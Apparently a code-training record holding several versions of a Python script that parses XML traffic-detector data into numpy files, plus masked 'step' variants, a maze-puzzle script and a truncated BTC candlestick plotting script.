lanes = det.getElementsByTagName('lane')
for lane in lanes:
laneStatus = lane.getElementsByTagName('lane-Status')[0]
if laneStatus.childNodes[0].data == 'OK':
try:
laneVolume += int(lane.getElementsByTagName(
'lane-Volume')[0].childNodes[0].data)
laneOccupancy += int(lane.getElementsByTagName(
'lane-Occupancy')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
laneSpeed += int(lane.getElementsByTagName(
'lane-Speed')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
except IndexError:
break
else:
break
if laneVolume > 0:
for i in range(0, len(detname)):
if detectorID.childNodes[0].data == detname[i]:
c = i
detectorData[c][0].append(date)
detectorData[c][1].append(time)
detectorData[c][2].append(laneVolume)
detectorData[c][3].append(laneOccupancy / float(laneVolume))
detectorData[c][4].append(laneSpeed / float(laneVolume))
month_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'
os.chdir(month_dir)
day_dir = get_branches_dir(month_dir)
detNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D',
'MI044E250.8D', 'MI044E246.6D']
ErrorFiles = []
for dayFile in day_dir:
detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],
[], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [
], []]]
xmlFiles = get_branches_dir(dayFile)
for xml in xmlFiles:
if not os.path.isdir(xml):
print(xml)
tolist(xml, detNames)
for i in range(0, len(detNames)):
m = np.array(detectorData[i])
os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])
np.save(detectorData[0][0][0] + '.npy', m)
<|reserved_special_token_1|>
import os
from xml.dom import minidom
import numpy as np
def get_branches_dir(root_dir):
branches_dir = []
folds = os.listdir(root_dir)
while folds:
branch_dir = root_dir + '/' + folds.pop()
branches_dir.append(branch_dir)
return branches_dir
def tolist(xml, detname):
try:
data = minidom.parse(xml)
except:
print('parse error')
ErrorFiles.append(xml)
return
detectors = data.documentElement
date = detectors.getElementsByTagName('date')[0].childNodes[0].data
time = detectors.getElementsByTagName('time')[0].childNodes[0].data
dets = detectors.getElementsByTagName('detector')
laneVolume = 0
laneOccupancy = 0
laneSpeed = 0
for det in dets:
try:
detectorID = det.getElementsByTagName('detector-Id')[0]
except IndexError:
continue
if detectorID.childNodes[0].data in detname:
lanes = det.getElementsByTagName('lane')
for lane in lanes:
laneStatus = lane.getElementsByTagName('lane-Status')[0]
if laneStatus.childNodes[0].data == 'OK':
try:
laneVolume += int(lane.getElementsByTagName(
'lane-Volume')[0].childNodes[0].data)
laneOccupancy += int(lane.getElementsByTagName(
'lane-Occupancy')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
laneSpeed += int(lane.getElementsByTagName(
'lane-Speed')[0].childNodes[0].data) * int(lane
.getElementsByTagName('lane-Volume')[0].
childNodes[0].data)
except IndexError:
break
else:
break
if laneVolume > 0:
for i in range(0, len(detname)):
if detectorID.childNodes[0].data == detname[i]:
c = i
detectorData[c][0].append(date)
detectorData[c][1].append(time)
detectorData[c][2].append(laneVolume)
detectorData[c][3].append(laneOccupancy / float(laneVolume))
detectorData[c][4].append(laneSpeed / float(laneVolume))
month_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'
os.chdir(month_dir)
day_dir = get_branches_dir(month_dir)
detNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D',
'MI044E250.8D', 'MI044E246.6D']
ErrorFiles = []
for dayFile in day_dir:
detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],
[], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [
], []]]
xmlFiles = get_branches_dir(dayFile)
for xml in xmlFiles:
if not os.path.isdir(xml):
print(xml)
tolist(xml, detNames)
for i in range(0, len(detNames)):
m = np.array(detectorData[i])
os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])
np.save(detectorData[0][0][0] + '.npy', m)
<|reserved_special_token_1|>
import os
from xml.dom import minidom
import numpy as np
def get_branches_dir(root_dir):
branches_dir = []
folds = os.listdir(root_dir)
while folds:
branch_dir = root_dir + '/' + folds.pop()
branches_dir.append(branch_dir)
return branches_dir
def tolist(xml, detname):
try:
data = minidom.parse(xml)
except:
print('parse error')
ErrorFiles.append(xml)
return
detectors = data.documentElement
date = detectors.getElementsByTagName('date')[0].childNodes[0].data
time = detectors.getElementsByTagName('time')[0].childNodes[0].data
dets = detectors.getElementsByTagName('detector')
laneVolume = 0
laneOccupancy = 0
laneSpeed = 0
for det in dets:
try:
detectorID = det.getElementsByTagName('detector-Id')[0]
except IndexError:
continue
# print"\ndetector-Id: %s" % detectorID.childNodes[0].data
if detectorID.childNodes[0].data in detname:
lanes = det.getElementsByTagName('lane')
for lane in lanes:
# laneNumber = lane.getElementsByTagName('lane-Number')[0]
laneStatus = lane.getElementsByTagName('lane-Status')[0]
if laneStatus.childNodes[0].data == "OK":
try:
laneVolume += int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
laneOccupancy += int(lane.getElementsByTagName('lane-Occupancy')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
laneSpeed += int(lane.getElementsByTagName('lane-Speed')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)
except IndexError:
break
else:
break
if laneVolume > 0:
for i in range(0, len(detname)):
if detectorID.childNodes[0].data == detname[i]:
c = i
detectorData[c][0].append(date)
detectorData[c][1].append(time)
detectorData[c][2].append(laneVolume)
detectorData[c][3].append(laneOccupancy/float(laneVolume))
detectorData[c][4].append(laneSpeed/float(laneVolume))
month_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'
os.chdir(month_dir) # change the current working directory to path.
day_dir = get_branches_dir(month_dir)
detNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D', 'MI044E250.8D', 'MI044E246.6D']
ErrorFiles = []
for dayFile in day_dir:
detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []]]
xmlFiles = get_branches_dir(dayFile)
for xml in xmlFiles:
if not os.path.isdir(xml):
print(xml)
tolist(xml, detNames)
for i in range(0, len(detNames)):
m = np.array(detectorData[i])
os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/'+detNames[i])
np.save(detectorData[0][0][0]+'.npy', m)
|
flexible
|
{
"blob_id": "2b7bb02a25504e7481d3bc637ea09bcf9addb990",
"index": 7699,
"step-1": "<mask token>\n\n\ndef get_branches_dir(root_dir):\n branches_dir = []\n folds = os.listdir(root_dir)\n while folds:\n branch_dir = root_dir + '/' + folds.pop()\n branches_dir.append(branch_dir)\n return branches_dir\n\n\ndef tolist(xml, detname):\n try:\n data = minidom.parse(xml)\n except:\n print('parse error')\n ErrorFiles.append(xml)\n return\n detectors = data.documentElement\n date = detectors.getElementsByTagName('date')[0].childNodes[0].data\n time = detectors.getElementsByTagName('time')[0].childNodes[0].data\n dets = detectors.getElementsByTagName('detector')\n laneVolume = 0\n laneOccupancy = 0\n laneSpeed = 0\n for det in dets:\n try:\n detectorID = det.getElementsByTagName('detector-Id')[0]\n except IndexError:\n continue\n if detectorID.childNodes[0].data in detname:\n lanes = det.getElementsByTagName('lane')\n for lane in lanes:\n laneStatus = lane.getElementsByTagName('lane-Status')[0]\n if laneStatus.childNodes[0].data == 'OK':\n try:\n laneVolume += int(lane.getElementsByTagName(\n 'lane-Volume')[0].childNodes[0].data)\n laneOccupancy += int(lane.getElementsByTagName(\n 'lane-Occupancy')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n laneSpeed += int(lane.getElementsByTagName(\n 'lane-Speed')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n except IndexError:\n break\n else:\n break\n if laneVolume > 0:\n for i in range(0, len(detname)):\n if detectorID.childNodes[0].data == detname[i]:\n c = i\n detectorData[c][0].append(date)\n detectorData[c][1].append(time)\n detectorData[c][2].append(laneVolume)\n detectorData[c][3].append(laneOccupancy / float(laneVolume))\n detectorData[c][4].append(laneSpeed / float(laneVolume))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_branches_dir(root_dir):\n branches_dir = []\n folds = os.listdir(root_dir)\n while folds:\n branch_dir = root_dir + '/' + folds.pop()\n branches_dir.append(branch_dir)\n return branches_dir\n\n\ndef tolist(xml, detname):\n try:\n data = minidom.parse(xml)\n except:\n print('parse error')\n ErrorFiles.append(xml)\n return\n detectors = data.documentElement\n date = detectors.getElementsByTagName('date')[0].childNodes[0].data\n time = detectors.getElementsByTagName('time')[0].childNodes[0].data\n dets = detectors.getElementsByTagName('detector')\n laneVolume = 0\n laneOccupancy = 0\n laneSpeed = 0\n for det in dets:\n try:\n detectorID = det.getElementsByTagName('detector-Id')[0]\n except IndexError:\n continue\n if detectorID.childNodes[0].data in detname:\n lanes = det.getElementsByTagName('lane')\n for lane in lanes:\n laneStatus = lane.getElementsByTagName('lane-Status')[0]\n if laneStatus.childNodes[0].data == 'OK':\n try:\n laneVolume += int(lane.getElementsByTagName(\n 'lane-Volume')[0].childNodes[0].data)\n laneOccupancy += int(lane.getElementsByTagName(\n 'lane-Occupancy')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n laneSpeed += int(lane.getElementsByTagName(\n 'lane-Speed')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n except IndexError:\n break\n else:\n break\n if laneVolume > 0:\n for i in range(0, len(detname)):\n if detectorID.childNodes[0].data == detname[i]:\n c = i\n detectorData[c][0].append(date)\n detectorData[c][1].append(time)\n detectorData[c][2].append(laneVolume)\n detectorData[c][3].append(laneOccupancy / float(laneVolume))\n detectorData[c][4].append(laneSpeed / float(laneVolume))\n\n\n<mask token>\nos.chdir(month_dir)\n<mask token>\nfor dayFile in day_dir:\n detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],\n [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [\n ], []]]\n xmlFiles = get_branches_dir(dayFile)\n for xml in xmlFiles:\n if not os.path.isdir(xml):\n print(xml)\n tolist(xml, detNames)\n for i in range(0, len(detNames)):\n m = np.array(detectorData[i])\n os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])\n np.save(detectorData[0][0][0] + '.npy', m)\n",
"step-3": "<mask token>\n\n\ndef get_branches_dir(root_dir):\n branches_dir = []\n folds = os.listdir(root_dir)\n while folds:\n branch_dir = root_dir + '/' + folds.pop()\n branches_dir.append(branch_dir)\n return branches_dir\n\n\ndef tolist(xml, detname):\n try:\n data = minidom.parse(xml)\n except:\n print('parse error')\n ErrorFiles.append(xml)\n return\n detectors = data.documentElement\n date = detectors.getElementsByTagName('date')[0].childNodes[0].data\n time = detectors.getElementsByTagName('time')[0].childNodes[0].data\n dets = detectors.getElementsByTagName('detector')\n laneVolume = 0\n laneOccupancy = 0\n laneSpeed = 0\n for det in dets:\n try:\n detectorID = det.getElementsByTagName('detector-Id')[0]\n except IndexError:\n continue\n if detectorID.childNodes[0].data in detname:\n lanes = det.getElementsByTagName('lane')\n for lane in lanes:\n laneStatus = lane.getElementsByTagName('lane-Status')[0]\n if laneStatus.childNodes[0].data == 'OK':\n try:\n laneVolume += int(lane.getElementsByTagName(\n 'lane-Volume')[0].childNodes[0].data)\n laneOccupancy += int(lane.getElementsByTagName(\n 'lane-Occupancy')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n laneSpeed += int(lane.getElementsByTagName(\n 'lane-Speed')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n except IndexError:\n break\n else:\n break\n if laneVolume > 0:\n for i in range(0, len(detname)):\n if detectorID.childNodes[0].data == detname[i]:\n c = i\n detectorData[c][0].append(date)\n detectorData[c][1].append(time)\n detectorData[c][2].append(laneVolume)\n detectorData[c][3].append(laneOccupancy / float(laneVolume))\n detectorData[c][4].append(laneSpeed / float(laneVolume))\n\n\nmonth_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'\nos.chdir(month_dir)\nday_dir = get_branches_dir(month_dir)\ndetNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D',\n 'MI044E250.8D', 'MI044E246.6D']\nErrorFiles = []\nfor dayFile in day_dir:\n detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],\n [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [\n ], []]]\n xmlFiles = get_branches_dir(dayFile)\n for xml in xmlFiles:\n if not os.path.isdir(xml):\n print(xml)\n tolist(xml, detNames)\n for i in range(0, len(detNames)):\n m = np.array(detectorData[i])\n os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])\n np.save(detectorData[0][0][0] + '.npy', m)\n",
"step-4": "import os\nfrom xml.dom import minidom\nimport numpy as np\n\n\ndef get_branches_dir(root_dir):\n branches_dir = []\n folds = os.listdir(root_dir)\n while folds:\n branch_dir = root_dir + '/' + folds.pop()\n branches_dir.append(branch_dir)\n return branches_dir\n\n\ndef tolist(xml, detname):\n try:\n data = minidom.parse(xml)\n except:\n print('parse error')\n ErrorFiles.append(xml)\n return\n detectors = data.documentElement\n date = detectors.getElementsByTagName('date')[0].childNodes[0].data\n time = detectors.getElementsByTagName('time')[0].childNodes[0].data\n dets = detectors.getElementsByTagName('detector')\n laneVolume = 0\n laneOccupancy = 0\n laneSpeed = 0\n for det in dets:\n try:\n detectorID = det.getElementsByTagName('detector-Id')[0]\n except IndexError:\n continue\n if detectorID.childNodes[0].data in detname:\n lanes = det.getElementsByTagName('lane')\n for lane in lanes:\n laneStatus = lane.getElementsByTagName('lane-Status')[0]\n if laneStatus.childNodes[0].data == 'OK':\n try:\n laneVolume += int(lane.getElementsByTagName(\n 'lane-Volume')[0].childNodes[0].data)\n laneOccupancy += int(lane.getElementsByTagName(\n 'lane-Occupancy')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n laneSpeed += int(lane.getElementsByTagName(\n 'lane-Speed')[0].childNodes[0].data) * int(lane\n .getElementsByTagName('lane-Volume')[0].\n childNodes[0].data)\n except IndexError:\n break\n else:\n break\n if laneVolume > 0:\n for i in range(0, len(detname)):\n if detectorID.childNodes[0].data == detname[i]:\n c = i\n detectorData[c][0].append(date)\n detectorData[c][1].append(time)\n detectorData[c][2].append(laneVolume)\n detectorData[c][3].append(laneOccupancy / float(laneVolume))\n detectorData[c][4].append(laneSpeed / float(laneVolume))\n\n\nmonth_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'\nos.chdir(month_dir)\nday_dir = get_branches_dir(month_dir)\ndetNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D',\n 'MI044E250.8D', 'MI044E246.6D']\nErrorFiles = []\nfor dayFile in day_dir:\n detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [],\n [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [\n ], []]]\n xmlFiles = get_branches_dir(dayFile)\n for xml in xmlFiles:\n if not os.path.isdir(xml):\n print(xml)\n tolist(xml, detNames)\n for i in range(0, len(detNames)):\n m = np.array(detectorData[i])\n os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/' + detNames[i])\n np.save(detectorData[0][0][0] + '.npy', m)\n",
"step-5": "import os\nfrom xml.dom import minidom\nimport numpy as np\n\n\ndef get_branches_dir(root_dir):\n branches_dir = []\n folds = os.listdir(root_dir)\n while folds:\n branch_dir = root_dir + '/' + folds.pop()\n branches_dir.append(branch_dir)\n return branches_dir\n\n\ndef tolist(xml, detname):\n try:\n data = minidom.parse(xml)\n except:\n print('parse error')\n ErrorFiles.append(xml)\n return\n\n detectors = data.documentElement\n date = detectors.getElementsByTagName('date')[0].childNodes[0].data\n time = detectors.getElementsByTagName('time')[0].childNodes[0].data\n dets = detectors.getElementsByTagName('detector')\n laneVolume = 0\n laneOccupancy = 0\n laneSpeed = 0\n for det in dets:\n try:\n detectorID = det.getElementsByTagName('detector-Id')[0]\n except IndexError:\n continue\n # print\"\\ndetector-Id: %s\" % detectorID.childNodes[0].data\n if detectorID.childNodes[0].data in detname:\n lanes = det.getElementsByTagName('lane')\n for lane in lanes:\n # laneNumber = lane.getElementsByTagName('lane-Number')[0]\n laneStatus = lane.getElementsByTagName('lane-Status')[0]\n if laneStatus.childNodes[0].data == \"OK\":\n try:\n laneVolume += int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)\n laneOccupancy += int(lane.getElementsByTagName('lane-Occupancy')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)\n laneSpeed += int(lane.getElementsByTagName('lane-Speed')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)\n except IndexError:\n break\n else:\n break\n\n if laneVolume > 0:\n for i in range(0, len(detname)):\n if detectorID.childNodes[0].data == detname[i]:\n c = i\n detectorData[c][0].append(date)\n detectorData[c][1].append(time)\n detectorData[c][2].append(laneVolume)\n detectorData[c][3].append(laneOccupancy/float(laneVolume))\n detectorData[c][4].append(laneSpeed/float(laneVolume))\n\n\nmonth_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'\nos.chdir(month_dir) # change the current working directory to path.\nday_dir = get_branches_dir(month_dir)\ndetNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D', 'MI044E250.8D', 'MI044E246.6D']\nErrorFiles = []\nfor dayFile in day_dir:\n detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []]]\n xmlFiles = get_branches_dir(dayFile)\n for xml in xmlFiles:\n if not os.path.isdir(xml):\n print(xml)\n tolist(xml, detNames)\n\n for i in range(0, len(detNames)):\n m = np.array(detectorData[i])\n os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/'+detNames[i])\n np.save(detectorData[0][0][0]+'.npy', m)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
log.uploadLogs(4)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
log = LogUpload()
log.uploadLogs(4)
<|reserved_special_token_1|>
from logupload import *
log = LogUpload()
log.uploadLogs(4)
|
flexible
|
{
"blob_id": "421837698b7fc188c84a3221271f11a40d1625d9",
"index": 7280,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nlog.uploadLogs(4)\n",
"step-3": "<mask token>\nlog = LogUpload()\nlog.uploadLogs(4)\n",
"step-4": "from logupload import *\nlog = LogUpload()\nlog.uploadLogs(4)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# maze = [0, 3, 0, 1, -3]
with open('./day_5/input.txt') as f:
maze = f.readlines()
f.close
maze = [int(line.strip()) for line in maze]
# I think I will just expand on the original functions
# from now on rather than separating part one from two
def escape_maze(maze):
end = len(maze) - 1
step_counter = 0
offset = 0
while True:
cur_index = offset
offset = offset + maze[cur_index]
if maze[cur_index] >= 3:
maze[cur_index] = maze[cur_index] - 1
else:
maze[cur_index] = maze[cur_index] + 1
step_counter += 1
if offset > end:
return step_counter
print(escape_maze(maze))
|
normal
|
{
"blob_id": "a4dfac7e15064d92c806a4e3f972f06e4dca6b11",
"index": 5181,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef escape_maze(maze):\n end = len(maze) - 1\n step_counter = 0\n offset = 0\n while True:\n cur_index = offset\n offset = offset + maze[cur_index]\n if maze[cur_index] >= 3:\n maze[cur_index] = maze[cur_index] - 1\n else:\n maze[cur_index] = maze[cur_index] + 1\n step_counter += 1\n if offset > end:\n return step_counter\n\n\n<mask token>\n",
"step-3": "with open('./day_5/input.txt') as f:\n maze = f.readlines()\nf.close\n<mask token>\n\n\ndef escape_maze(maze):\n end = len(maze) - 1\n step_counter = 0\n offset = 0\n while True:\n cur_index = offset\n offset = offset + maze[cur_index]\n if maze[cur_index] >= 3:\n maze[cur_index] = maze[cur_index] - 1\n else:\n maze[cur_index] = maze[cur_index] + 1\n step_counter += 1\n if offset > end:\n return step_counter\n\n\nprint(escape_maze(maze))\n",
"step-4": "with open('./day_5/input.txt') as f:\n maze = f.readlines()\nf.close\nmaze = [int(line.strip()) for line in maze]\n\n\ndef escape_maze(maze):\n end = len(maze) - 1\n step_counter = 0\n offset = 0\n while True:\n cur_index = offset\n offset = offset + maze[cur_index]\n if maze[cur_index] >= 3:\n maze[cur_index] = maze[cur_index] - 1\n else:\n maze[cur_index] = maze[cur_index] + 1\n step_counter += 1\n if offset > end:\n return step_counter\n\n\nprint(escape_maze(maze))\n",
"step-5": "# maze = [0, 3, 0, 1, -3]\nwith open('./day_5/input.txt') as f:\n maze = f.readlines()\nf.close\nmaze = [int(line.strip()) for line in maze]\n\n# I think I will just expand on the original functions\n# from now on rather than separating part one from two\ndef escape_maze(maze):\n end = len(maze) - 1\n step_counter = 0\n offset = 0\n\n while True:\n cur_index = offset\n offset = offset + maze[cur_index]\n if maze[cur_index] >= 3:\n maze[cur_index] = maze[cur_index] - 1\n else:\n maze[cur_index] = maze[cur_index] + 1\n step_counter += 1\n if offset > end:\n return step_counter\n\n\nprint(escape_maze(maze))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for cnt in range(20, len(rows)):
row_previous2 = rows[cnt - 2]
row_previous1 = rows[cnt - 1]
row = rows[cnt]
open = row[2]
high = row[3]
low = row[4]
close = row[5]
vol = row[6]
vol_buy, vol_sell = row[7:9]
avg_buy, avg_sell, avg_amount_per_trade = row[-3:]
date = date + 1
data = date, open, high, low, close
alist.append(data)
vols_bid.append(-vol_buy)
vols_ask.append(vol_sell)
diff_bid_2_ask.append(vol_buy - vol_sell)
diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -
vol_sell - row_previous1[8])
diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +
row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])
avg_buy_diff_sell.append(avg_buy - avg_sell)
avg_amounts.append(avg_amount_per_trade * 100)
dates.append(date)
<|reserved_special_token_0|>
mpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')
axes[0].set_title('BTC')
axes[0].set_ylabel('价格')
axes[0].grid(True)
axes[0].xaxis_date()
axes[1].plot(dates, avg_buy_diff_sell, c='orange')
axes[1].plot(dates, avg_amounts, c='blue')
axes[1].set_ylabel('成交量')
axes[1].grid(True)
axes[2].plot(dates, diff_bid_2_ask, c='green')
axes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')
axes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')
axes[2].set_ylabel('成交量')
axes[2].grid(True)
axes[2].set_ylabel('买卖均价')
axes[2].grid(True)
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
pgmanager = DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)
tablename = 'klines_full_vol_50'
rows = pgmanager.select('select * from ' + tablename +
' where timestamp>1577808000+86400*5 order by timestamp limit 300')
a = 1
alist = []
vols_bid = []
vols_ask = []
diff_bid_2_ask = []
diff_bid_2_ask_in_past_2_epochs = []
diff_bid_2_ask_in_past_3_epochs = []
diff_bid_2_ask_in_past_5_epochs = []
diff_bid_2_ask_in_past_10_epochs = []
diff_bid_2_ask_in_past_20_epochs = []
avg_buys = []
avg_sells = []
avg_buy_diff_sell = []
avg_amounts = []
dates = []
cnt = 0
date = date2num(datetime.datetime.fromtimestamp(rows[0][1]))
for cnt in range(20, len(rows)):
row_previous2 = rows[cnt - 2]
row_previous1 = rows[cnt - 1]
row = rows[cnt]
open = row[2]
high = row[3]
low = row[4]
close = row[5]
vol = row[6]
vol_buy, vol_sell = row[7:9]
avg_buy, avg_sell, avg_amount_per_trade = row[-3:]
date = date + 1
data = date, open, high, low, close
alist.append(data)
vols_bid.append(-vol_buy)
vols_ask.append(vol_sell)
diff_bid_2_ask.append(vol_buy - vol_sell)
diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -
vol_sell - row_previous1[8])
diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +
row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])
avg_buy_diff_sell.append(avg_buy - avg_sell)
avg_amounts.append(avg_amount_per_trade * 100)
dates.append(date)
fig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))
mpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')
axes[0].set_title('BTC')
axes[0].set_ylabel('价格')
axes[0].grid(True)
axes[0].xaxis_date()
axes[1].plot(dates, avg_buy_diff_sell, c='orange')
axes[1].plot(dates, avg_amounts, c='blue')
axes[1].set_ylabel('成交量')
axes[1].grid(True)
axes[2].plot(dates, diff_bid_2_ask, c='green')
axes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')
axes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')
axes[2].set_ylabel('成交量')
axes[2].grid(True)
axes[2].set_ylabel('买卖均价')
axes[2].grid(True)
plt.show()
<|reserved_special_token_1|>
from packages import data as DATA
from packages import plot as PLOT
from packages import universal as UNIVERSAL
from packages import currency_pair as CP
import matplotlib.pyplot as plt
import mpl_finance as mpf
from packages import db as DB
import CONSTANTS
import datetime
from matplotlib.pylab import date2num
from matplotlib.widgets import Cursor
pgmanager = DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)
tablename = 'klines_full_vol_50'
rows = pgmanager.select('select * from ' + tablename +
' where timestamp>1577808000+86400*5 order by timestamp limit 300')
a = 1
alist = []
vols_bid = []
vols_ask = []
diff_bid_2_ask = []
diff_bid_2_ask_in_past_2_epochs = []
diff_bid_2_ask_in_past_3_epochs = []
diff_bid_2_ask_in_past_5_epochs = []
diff_bid_2_ask_in_past_10_epochs = []
diff_bid_2_ask_in_past_20_epochs = []
avg_buys = []
avg_sells = []
avg_buy_diff_sell = []
avg_amounts = []
dates = []
cnt = 0
date = date2num(datetime.datetime.fromtimestamp(rows[0][1]))
for cnt in range(20, len(rows)):
row_previous2 = rows[cnt - 2]
row_previous1 = rows[cnt - 1]
row = rows[cnt]
open = row[2]
high = row[3]
low = row[4]
close = row[5]
vol = row[6]
vol_buy, vol_sell = row[7:9]
avg_buy, avg_sell, avg_amount_per_trade = row[-3:]
date = date + 1
data = date, open, high, low, close
alist.append(data)
vols_bid.append(-vol_buy)
vols_ask.append(vol_sell)
diff_bid_2_ask.append(vol_buy - vol_sell)
diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -
vol_sell - row_previous1[8])
diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +
row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])
avg_buy_diff_sell.append(avg_buy - avg_sell)
avg_amounts.append(avg_amount_per_trade * 100)
dates.append(date)
fig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))
mpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')
axes[0].set_title('BTC')
axes[0].set_ylabel('价格')
axes[0].grid(True)
axes[0].xaxis_date()
axes[1].plot(dates, avg_buy_diff_sell, c='orange')
axes[1].plot(dates, avg_amounts, c='blue')
axes[1].set_ylabel('成交量')
axes[1].grid(True)
axes[2].plot(dates, diff_bid_2_ask, c='green')
axes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')
axes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')
axes[2].set_ylabel('成交量')
axes[2].grid(True)
axes[2].set_ylabel('买卖均价')
axes[2].grid(True)
plt.show()
<|reserved_special_token_1|>
from packages import data as DATA
from packages import plot as PLOT
from packages import universal as UNIVERSAL
from packages import currency_pair as CP
import matplotlib.pyplot as plt
import mpl_finance as mpf
from packages import db as DB
import CONSTANTS
import datetime
from matplotlib.pylab import date2num
from matplotlib.widgets import Cursor
pgmanager=DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)
tablename='klines_full_vol_50'
rows=pgmanager.select('select * from '+tablename + ' where timestamp>1577808000+86400*5 order by timestamp limit 300')
a=1
alist = []
vols_bid = []
vols_ask = []
diff_bid_2_ask = []
diff_bid_2_ask_in_past_2_epochs = []
diff_bid_2_ask_in_past_3_epochs = []
diff_bid_2_ask_in_past_5_epochs = []
diff_bid_2_ask_in_past_10_epochs = []
diff_bid_2_ask_in_past_20_epochs = []
avg_buys=[]
avg_sells=[]
avg_buy_diff_sell=[]
avg_amounts=[]
dates = []
cnt = 0
date = date2num(datetime.datetime.fromtimestamp(rows[0][1]))
for cnt in range(20, len(rows)):
row_previous2=rows[cnt-2]
row_previous1 = rows[cnt - 1]
row = rows[cnt]
open=row[2]
high=row[3]
low=row[4]
close=row[5]
vol=row[6]
vol_buy,vol_sell=row[7:9]
avg_buy, avg_sell, avg_amount_per_trade=row[-3:]
date = date + 1
